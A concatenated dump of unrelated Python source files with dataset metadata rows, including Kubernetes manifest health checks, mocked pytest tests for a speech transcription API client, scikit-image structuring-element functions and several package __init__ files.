matchesLimit = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.limits.cpu').find(workloadData)
matchesRequest = parse('spec.jobTemplate.spec.template.spec.containers[*].resources.requests.cpu').find(workloadData)
numContainers = len(workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers'])
if ((len(matchesLimit)and len(matchesRequest)) > 0) and (len(matchesLimit) == numContainers):
for container in workloadData['spec']['jobTemplate']['spec']['template']['spec']['containers']:
numeric_filter = filter(str.isdigit, container['resources']['limits']['cpu'])
cpuLimit = int("".join(numeric_filter))
numeric_filter = filter(str.isdigit, container['resources']['requests']['cpu'])
cpuRequest = int("".join(numeric_filter))
retval['text'] = "Ratio: " + str(Fraction(cpuLimit, cpuRequest))
retval['status'] = 'pass'
if(float(cpuLimit / cpuRequest) > 3):
retval['status'] = 'warning'
else:
retval['status'] = 'fail'
retval['text'] = "could not find both a cpu limit and a cpu request"
return retval
#def
def probeHeader(workloadData):
retval = {'status': 'groupHeader', 'title': 'Application Health', 'text': ''}
return retval
#end
def resourceUtilizationHeader(workloadData):
retval = {'status': 'groupHeader', 'title': 'Resource Allocation', 'text': ''}
return retval
#end
def livenessProbeCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].livenessProbe').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
noEmptyProbes = True
for match in matches:
if len(match.value.keys()) == 0:
noEmptyProbes = False
if (len(matches) > 0) and noEmptyProbes and (len(matches) == numContainers):
retval['status'] = 'pass'
container_liveness_probes = []
for container in workloadData['spec']['template']['spec']['containers']:
container_liveness_probes = container_liveness_probes + [{'container_name': container['name'], 'livenessProbe': container['livenessProbe']}]
retval['text'] = yaml.dump(container_liveness_probes)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have a liveness probe defined. All containers should have one."
return retval
#end
def readinessProbeCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.containers[*].readinessProbe').find(workloadData)
numContainers = len(workloadData['spec']['template']['spec']['containers'])
noEmptyProbes = True
for match in matches:
if len(match.value.keys()) == 0:
noEmptyProbes = False
if (len(matches) > 0) and noEmptyProbes and (len(matches) == numContainers):
retval['status'] = 'pass'
container_readiness_probes = []
for container in workloadData['spec']['template']['spec']['containers']:
container_readiness_probes = container_readiness_probes + [{'container_name': container['name'], 'readinessProbe': container['readinessProbe']}]
retval['text'] = yaml.dump(container_readiness_probes)
else:
retval['status'] = 'fail'
retval['text'] = str(len(matches)) + " of " + str(numContainers) + " containers have a readiness probe defines. All containers should have one."
return retval
#end
def statelessCheck(workloadData):
retval = {'status': 'notApplicable', 'text': ''}
matches = parse('spec.template.spec.volumes[*].persistentVolumeClaim').find(workloadData)
if (len(matches) > 0):
retval['status'] = 'warning'
pvcList = []
for match in matches:
pvcList = pvcList + [match.value]
retval['text'] = "stateless application should not need a persistent volume. The following persistent volume claims were found: \n" + yaml.dump(pvcList)
else:
retval['status'] = 'pass'
return retval
#end
| 49.264085
| 186
| 0.691659
| 1,494
| 13,991
| 6.405622
| 0.097055
| 0.061442
| 0.065204
| 0.103239
| 0.840961
| 0.81139
| 0.804911
| 0.804911
| 0.785684
| 0.776489
| 0
| 0.002066
| 0.135087
| 13,991
| 283
| 187
| 49.438163
| 0.788778
| 0.00386
| 0
| 0.736842
| 0
| 0.004386
| 0.335513
| 0.068539
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0.070175
| 0.013158
| 0.004386
| 0.171053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e2ab6de6c6a0fa80dca98ca9039a0a78ed4a9df5
| 219
|
py
|
Python
|
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
oaoni/modAL
|
cadfe1cea023988120ff2b90b8dfecc432fe3b90
|
[
"MIT"
] | null | null | null |
from .learners import ActiveLearner, BayesianOptimizer, Committee, CommitteeRegressor, ActiveCompletion
__all__ = [
'ActiveLearner', 'BayesianOptimizer',
'Committee', 'CommitteeRegressor', 'ActiveCompletion'
]
| 31.285714
| 103
| 0.780822
| 14
| 219
| 11.928571
| 0.642857
| 0.359281
| 0.467066
| 0.682635
| 0.874252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118721
| 219
| 6
| 104
| 36.5
| 0.865285
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c85827d450882fbb1ee2d24b61b9466f08fbf04
| 17,975
|
py
|
Python
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | 2
|
2018-10-23T00:45:22.000Z
|
2018-11-25T08:57:27.000Z
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | 1
|
2018-10-23T00:44:41.000Z
|
2018-10-23T00:44:41.000Z
|
tests/test_job.py
|
revdotcom/revai-python-package
|
8ee68b6e017f61a79268b36f34c1ad5b8b150ef2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Unit tests for job endpoints"""
import json
import pytest
from src.rev_ai.models.customer_url_data import CustomerUrlData
from src.rev_ai.apiclient import RevAiAPIClient
from src.rev_ai.models.asynchronous import Job, JobStatus, SpeakerName
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
JOB_ID = '1'
TOKEN = "token"
METADATA = 'test'
NOTIFICATION_URL = 'https://example.com/'
NOTIFICATION_AUTH = 'notification auth headers'
CREATED_ON = '2018-05-05T23:23:22.29Z'
SOURCE_URL = 'https://example.com/test.mp3'
SOURCE_AUTH = 'source auth headers'
FILENAME = 'test.mp3'
JOB_ID_URL = urljoin(RevAiAPIClient.base_url, 'jobs/{}'.format(JOB_ID))
JOBS_URL = urljoin(RevAiAPIClient.base_url, 'jobs')
CUSTOM_VOCAB = [{"phrases": ["word one", "word two"]}]
CUSTOM_VOCAB_ID = "vid"
LANGUAGE = 'en'
TRANSCRIBER = 'machine_v2'
SOURCE_CONFIG = CustomerUrlData(SOURCE_URL, SOURCE_AUTH)
NOTIFICATION_CONFIG = CustomerUrlData(NOTIFICATION_URL, NOTIFICATION_AUTH)
@pytest.mark.usefixtures('mock_session', 'make_mock_response')
class TestJobEndpoints():
def test_get_job_details_with_success(self, mock_session, make_mock_response):
status = 'transcribed'
created_on = '2018-05-05T23:23:22.29Z'
data = {
'id': JOB_ID,
'status': status,
'created_on': created_on
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.get_job_details(JOB_ID)
assert res == Job(JOB_ID, created_on, JobStatus.TRANSCRIBED)
mock_session.request.assert_called_once_with("GET",
JOB_ID_URL,
headers=client.default_headers)
@pytest.mark.parametrize('id', [None, ''])
def test_get_job_details_with_no_job_id(self, id, mock_session):
with pytest.raises(ValueError, match='id_ must be provided'):
RevAiAPIClient(TOKEN).get_job_details(id)
def test_get_list_of_jobs_limit_with_success(self, mock_session, make_mock_response):
status = 'transcribed'
created_on = '2018-05-05T23:23:22.29Z'
data = [
{
'id': JOB_ID,
'status': status,
'created_on': created_on
},
{
'id': '2',
'status': 'in_progress',
'created_on': created_on
}
]
url = JOBS_URL + "?limit=2"
response = make_mock_response(url=url, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.get_list_of_jobs(limit=2)
assert isinstance(res, list)
assert len(res) == 2
mock_session.request.assert_called_once_with("GET", url, headers=client.default_headers)
def test_get_list_of_jobs_starting_after_with_success(self, mock_session, make_mock_response):
status = 'transcribed'
created_on = '2018-05-05T23:23:22.29Z'
data = [
{
'id': JOB_ID,
'status': status,
'created_on': created_on
}
]
url = JOBS_URL + "?starting_after=4"
response = make_mock_response(url=url, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.get_list_of_jobs(starting_after="4")
assert isinstance(res, list)
assert len(res) == 1
mock_session.request.assert_called_once_with("GET", url, headers=client.default_headers)
def test_submit_job_url_with_success(self, mock_session, make_mock_response):
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': CREATED_ON,
'metadata': METADATA,
'skip_diarization': True,
'skip_punctuation': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.submit_job_url(SOURCE_URL, METADATA,
NOTIFICATION_URL, True,
True, 1, CUSTOM_VOCAB, True,
True, 0, LANGUAGE, CUSTOM_VOCAB_ID,
TRANSCRIBER)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
json={
'media_url': SOURCE_URL,
'callback_url': NOTIFICATION_URL,
'metadata': METADATA,
'skip_diarization': True,
'skip_punctuation': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
},
headers=client.default_headers)
def test_submit_job_url_with_auth_options(self, mock_session, make_mock_response):
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': CREATED_ON,
'metadata': METADATA,
'skip_diarization': True,
'skip_punctuation': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.submit_job_url(metadata=METADATA, skip_diarization=True, skip_punctuation=True,
speaker_channels_count=1, custom_vocabularies=CUSTOM_VOCAB,
filter_profanity=True, remove_disfluencies=True,
delete_after_seconds=0, language=LANGUAGE,
custom_vocabulary_id=CUSTOM_VOCAB_ID, transcriber=TRANSCRIBER,
source_config=SOURCE_CONFIG,
notification_config=NOTIFICATION_CONFIG)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
json={
'source_config': {'url': SOURCE_URL, 'auth_headers': SOURCE_AUTH},
'notification_config': {'url': NOTIFICATION_URL, 'auth_headers': NOTIFICATION_AUTH},
'metadata': METADATA,
'skip_diarization': True,
'skip_punctuation': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
},
headers=client.default_headers)
def test_submit_job_url_with_human_transcription_and_success(self, mock_session,
make_mock_response):
segments = [{
'start': 1.0,
'end': 2.0
}]
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': CREATED_ON,
'transcriber': 'human',
'verbatim': True,
'segments_to_transcribe': segments
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.submit_job_url(SOURCE_URL, transcriber='human', verbatim=True, rush=False,
segments_to_transcribe=segments,
speaker_names=[SpeakerName('Kyle Bridburg')])
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
transcriber='human',
verbatim=True,
segments_to_transcribe=segments)
mock_session.request.assert_called_once_with(
'POST',
JOBS_URL,
json={
'media_url': SOURCE_URL,
'transcriber': 'human',
'verbatim': True,
'segments_to_transcribe': segments,
'speaker_names': [{'display_name': 'Kyle Bridburg'}]
},
headers=client.default_headers)
def test_submit_job_local_file_with_success(self, mocker, mock_session, make_mock_response):
created_on = '2018-05-05T23:23:22.29Z'
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': created_on,
'metadata': METADATA,
'callback_url': NOTIFICATION_URL,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
with mocker.patch('src.rev_ai.apiclient.open', create=True)() as file:
res = client.submit_job_local_file(FILENAME, METADATA,
NOTIFICATION_URL, True,
True, 1, CUSTOM_VOCAB, True,
True, 0, LANGUAGE, CUSTOM_VOCAB_ID,
TRANSCRIBER)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
callback_url=NOTIFICATION_URL,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
files={
'media': (FILENAME, file),
'options': (
None,
json.dumps({
'metadata': METADATA,
'callback_url': NOTIFICATION_URL,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
}, sort_keys=True)
)
},
headers=client.default_headers)
def test_submit_job_local_file_auth_options_with_success(self, mocker, mock_session,
make_mock_response):
created_on = '2018-05-05T23:23:22.29Z'
data = {
'id': JOB_ID,
'status': 'in_progress',
'created_on': created_on,
'metadata': METADATA,
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'transcriber': TRANSCRIBER
}
response = make_mock_response(url=JOB_ID_URL, json_data=data)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
with mocker.patch('src.rev_ai.apiclient.open', create=True)() as file:
res = client.submit_job_local_file(filename=FILENAME, metadata=METADATA,
callback_url=None, skip_diarization=True,
skip_punctuation=True, speaker_channels_count=1,
custom_vocabularies=CUSTOM_VOCAB,
filter_profanity=True, remove_disfluencies=True,
delete_after_seconds=0, language=LANGUAGE,
custom_vocabulary_id=CUSTOM_VOCAB_ID,
transcriber=TRANSCRIBER,
notification_config=NOTIFICATION_CONFIG)
assert res == Job(JOB_ID,
CREATED_ON,
JobStatus.IN_PROGRESS,
metadata=METADATA,
skip_punctuation=True,
skip_diarization=True,
speaker_channels_count=1,
filter_profanity=True,
remove_disfluencies=True,
delete_after_seconds=0,
language=LANGUAGE,
transcriber=TRANSCRIBER)
mock_session.request.assert_called_once_with(
"POST",
JOBS_URL,
files={
'media': (FILENAME, file),
'options': (
None,
json.dumps({
'metadata': METADATA,
'notification_config': {'url': NOTIFICATION_URL,
'auth_headers': NOTIFICATION_AUTH},
'skip_punctuation': True,
'skip_diarization': True,
'speaker_channels_count': 1,
'custom_vocabularies': CUSTOM_VOCAB,
'filter_profanity': True,
'remove_disfluencies': True,
'delete_after_seconds': 0,
'language': LANGUAGE,
'custom_vocabulary_id': CUSTOM_VOCAB_ID,
'transcriber': TRANSCRIBER
}, sort_keys=True)
)
},
headers=client.default_headers)
@pytest.mark.parametrize('filename', [None, ''])
def test_submit_job_url_with_no_filename(self, filename, mock_session):
with pytest.raises(ValueError, match='filename must be provided'):
RevAiAPIClient(TOKEN).submit_job_local_file(filename, None)
def test_delete_job_success(self, mock_session, make_mock_response):
response = make_mock_response(url=JOB_ID_URL, status=204)
mock_session.request.return_value = response
client = RevAiAPIClient(TOKEN)
res = client.delete_job(JOB_ID)
assert res is None
mock_session.request.assert_called_once_with("DELETE",
JOB_ID_URL,
headers=client.default_headers)
@pytest.mark.parametrize('id', [None, ''])
def test_delete_job_with_no_id(self, id, mock_session):
with pytest.raises(ValueError, match='id_ must be provided'):
RevAiAPIClient(TOKEN).delete_job(id)
| 42.594787
| 100
| 0.516551
| 1,594
| 17,975
| 5.486826
| 0.103513
| 0.038989
| 0.034759
| 0.038418
| 0.875143
| 0.856735
| 0.829179
| 0.791562
| 0.755774
| 0.741367
| 0
| 0.013671
| 0.40178
| 17,975
| 421
| 101
| 42.695962
| 0.799684
| 0.002837
| 0
| 0.710183
| 0
| 0
| 0.131488
| 0.02277
| 0
| 0
| 0
| 0
| 0.052219
| 1
| 0.031332
| false
| 0
| 0.020888
| 0
| 0.05483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cba0e2916aed52419b5806f0ad75802ee3d2113
| 1,169
|
py
|
Python
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 12
|
2020-08-28T20:49:00.000Z
|
2021-11-17T08:50:32.000Z
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/bespoke-f
|
27b072bd09610dc8209429118d739e1f453edd61
|
[
"MIT"
] | 95
|
2020-02-19T18:40:54.000Z
|
2021-12-02T10:52:23.000Z
|
openff/bespokefit/tests/schema/test_results.py
|
openforcefield/openff-bespokefit
|
85c92a51055a5a82e5d50fee1668a7de4ce2b1d4
|
[
"MIT"
] | 3
|
2021-04-01T04:22:49.000Z
|
2021-04-13T03:19:10.000Z
|
from simtk import unit
def test_initial_parameter_values(bespoke_optimization_results):
parameter_values = bespoke_optimization_results.initial_parameter_values
assert len(parameter_values) == len(
bespoke_optimization_results.input_schema.stages[0].parameters
)
assert all(
isinstance(parameter, unit.Quantity)
for x in parameter_values.values()
for parameter in x.values()
)
assert all(
parameter != 2 * unit.kilojoules_per_mole
for x in parameter_values.values()
for parameter in x.values()
)
def test_refit_parameter_values(bespoke_optimization_results):
refit_parameter_values = bespoke_optimization_results.refit_parameter_values
assert len(refit_parameter_values) == len(
bespoke_optimization_results.input_schema.stages[0].parameters
)
assert all(
isinstance(parameter, unit.Quantity)
for x in refit_parameter_values.values()
for parameter in x.values()
)
assert all(
parameter == 2 * unit.kilocalories_per_mole
for x in refit_parameter_values.values()
for parameter in x.values()
)
| 27.833333
| 80
| 0.707442
| 138
| 1,169
| 5.702899
| 0.224638
| 0.228717
| 0.198221
| 0.172808
| 0.864041
| 0.742058
| 0.742058
| 0.742058
| 0.742058
| 0.599746
| 0
| 0.00441
| 0.224123
| 1,169
| 41
| 81
| 28.512195
| 0.863286
| 0
| 0
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2cccae22279d7a1fd21be292e75bca1a0dd2d8ef
| 5,433
|
py
|
Python
|
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | null | null | null |
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | null | null | null |
skimage/morphology/selem.py
|
genp/scikit-image
|
0295d5423585efc39bea7b25b5b00a6f6ee4533a
|
[
"BSD-3-Clause"
] | 1
|
2020-02-25T10:44:47.000Z
|
2020-02-25T10:44:47.000Z
|
"""
:author: Damian Eads, 2009
:license: modified BSD
"""
import numpy as np
def square(width, dtype=np.uint8):
"""
Generates a flat, square-shaped structuring element. Every pixel
along the perimeter has a chessboard distance no greater than radius
(radius=floor(width/2)) pixels.
Parameters
----------
width : int
The width and height of the square
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, width), dtype=dtype)
def rectangle(width, height, dtype=np.uint8):
"""
Generates a flat, rectangular-shaped structuring element of a
given width and height. Every pixel in the rectangle belongs
to the neighboorhood.
Parameters
----------
width : int
The width of the rectangle
height : int
The height of the rectangle
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, height), dtype=dtype)
def diamond(radius, dtype=np.uint8):
"""
Generates a flat, diamond-shaped structuring element of a given
radius. A pixel is part of the neighborhood (i.e. labeled 1) if
the city block/manhattan distance between it and the center of the
neighborhood is no greater than radius.
Parameters
----------
radius : int
The radius of the diamond-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
half = radius
(I, J) = np.meshgrid(range(0, radius * 2 + 1), range(0, radius * 2 + 1))
s = np.abs(I - half) + np.abs(J - half)
return np.array(s <= radius, dtype=dtype)
def disk(radius, dtype=np.uint8):
"""
Generates a flat, disk-shaped structuring element of a given radius.
A pixel is within the neighborhood if the euclidean distance between
it and the origin is no greater than radius.
Parameters
----------
radius : int
The radius of the disk-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
L = np.linspace(-radius, radius, 2 * radius + 1)
(X, Y) = np.meshgrid(L, L)
s = X**2
s += Y**2
return np.array(s <= radius * radius, dtype=dtype)
def cube(width, dtype=np.uint8):
"""
Generates a cube-shaped structuring element (the 3D equivalent of
a square). Every pixel along the perimeter has a chessboard distance
no greater than radius (radius=floor(width/2)) pixels.
Parameters
----------
width : int
The width, height and depth of the cube
Other Parameters
----------------
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
A structuring element consisting only of ones, i.e. every
pixel belongs to the neighborhood.
"""
return np.ones((width, width, width), dtype=dtype)
def octahedron(radius, dtype=np.uint8):
"""
Generates a octahedron-shaped structuring element of a given radius
(the 3D equivalent of a diamond). A pixel is part of the
neighborhood (i.e. labeled 1) if the city block/manhattan distance
between it and the center of the neighborhood is no greater than
radius.
Parameters
----------
radius : int
The radius of the octahedron-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
# note that in contrast to diamond(), this method allows non-integer radii
n = 2 * radius + 1
Z, Y, X = np.mgrid[ -radius:radius:n*1j,
-radius:radius:n*1j,
-radius:radius:n*1j]
s = np.abs(X) + np.abs(Y) + np.abs(Z)
return np.array(s <= radius, dtype=dtype)
def ball(radius, dtype=np.uint8):
"""
Generates a ball-shaped structuring element of a given radius (the
3D equivalent of a disk). A pixel is within the neighborhood if the
euclidean distance between it and the origin is no greater than
radius.
Parameters
----------
radius : int
The radius of the ball-shaped structuring element.
dtype : data-type
The data type of the structuring element.
Returns
-------
selem : ndarray
The structuring element where elements of the neighborhood
are 1 and 0 otherwise.
"""
n = 2 * radius + 1
Z, Y, X = np.mgrid[ -radius:radius:n*1j,
-radius:radius:n*1j,
-radius:radius:n*1j]
s = X**2 + Y**2 + Z**2
return np.array(s <= radius * radius, dtype=dtype)
| 26.632353
| 78
| 0.618995
| 727
| 5,433
| 4.62586
| 0.155433
| 0.133809
| 0.078501
| 0.043711
| 0.823075
| 0.792447
| 0.741302
| 0.722272
| 0.702646
| 0.680642
| 0
| 0.0125
| 0.278483
| 5,433
| 203
| 79
| 26.763547
| 0.845408
| 0.658568
| 0
| 0.375
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21875
| false
| 0
| 0.03125
| 0
| 0.46875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
393050e7840ae4f4e8e3fbee59d51698e358eace
| 221
|
py
|
Python
|
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | 1
|
2020-07-26T01:08:30.000Z
|
2020-07-26T01:08:30.000Z
|
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | null | null | null |
commander/thirdparty/covertutils/handlers/impl/__init__.py
|
how2how/ToyHome
|
4457b1d28e21ed6fd4ab980a0f7fed345c570ae3
|
[
"Apache-2.0"
] | null | null | null |
from covertutils.handlers.impl.simpleshell import SimpleShellHandler
from covertutils.handlers.impl.standardshell import StandardShellHandler
from covertutils.handlers.impl.extendableshell import ExtendableShellHandler
| 36.833333
| 76
| 0.895928
| 21
| 221
| 9.428571
| 0.52381
| 0.227273
| 0.348485
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063348
| 221
| 5
| 77
| 44.2
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1aa8aad8731a399aadf713c93f4a6a84bb7757aa
| 191
|
py
|
Python
|
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | 2
|
2020-08-11T13:55:40.000Z
|
2021-01-05T15:23:32.000Z
|
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | null | null | null |
core/controllers/__init__.py
|
bopopescu/sdba
|
f1ecb71ebe627643fd296a07a3ca66b366cd37b9
|
[
"MIT"
] | 1
|
2020-07-24T07:26:46.000Z
|
2020-07-24T07:26:46.000Z
|
from core.controllers.admin import AdminController
from core.controllers.api import ApiController
from core.controllers.api_mock import ApiMockController
if __name__ == "__main__":
pass
| 27.285714
| 55
| 0.827225
| 23
| 191
| 6.478261
| 0.608696
| 0.161074
| 0.38255
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115183
| 191
| 6
| 56
| 31.833333
| 0.881657
| 0
| 0
| 0
| 0
| 0
| 0.041885
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
1aaaa292c2594302a83e70f7f6d38fe977df4f5d
| 11,953
|
py
|
Python
|
stockVars.py
|
md100play/Stock_Backtester
|
03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | 1
|
2017-05-28T22:30:07.000Z
|
2017-05-28T22:30:07.000Z
|
stockVars.py
|
MikeDombo/Stock_Backtester
|
03e8bf048f8a5602d8172dff0c1d12f2ed9af7ff
|
[
"MIT"
] | 1
|
2017-05-04T03:28:04.000Z
|
2017-05-04T05:45:53.000Z
|
stockVars.py
|
md100play/Stock_Backtester
|
